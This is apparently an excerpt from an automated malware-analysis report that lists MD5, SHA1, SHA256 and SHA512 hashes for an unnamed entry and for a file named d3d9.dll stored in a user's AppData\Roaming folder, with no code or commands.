  MD5: c4ca4238a0b923820dcc509a6f75849b
  SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
  SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

\Users\Admin\AppData\Roaming\d3d9.dll
  Filesize: 279KB
  MD5: 8fa26f1e37d3ff7f736fc93d520bc8ab
  SHA1: ad532e1cb4a1b3cd82c7a85647f8f6dd99833bb1
  SHA256: 6c47da8fbd12f22d7272fbf223e054bf5093c0922d0e8fb7d6289a5913c2e45d
  SHA512: 8a0b53cbc3a20e2f0fd41c486b1af1fbbcf7f2fed9f7368b672a07f25faaa2568bbdbcf0841233ac8c473a4d1dee099e90bf6098a6fa15e44b8526efdafc1287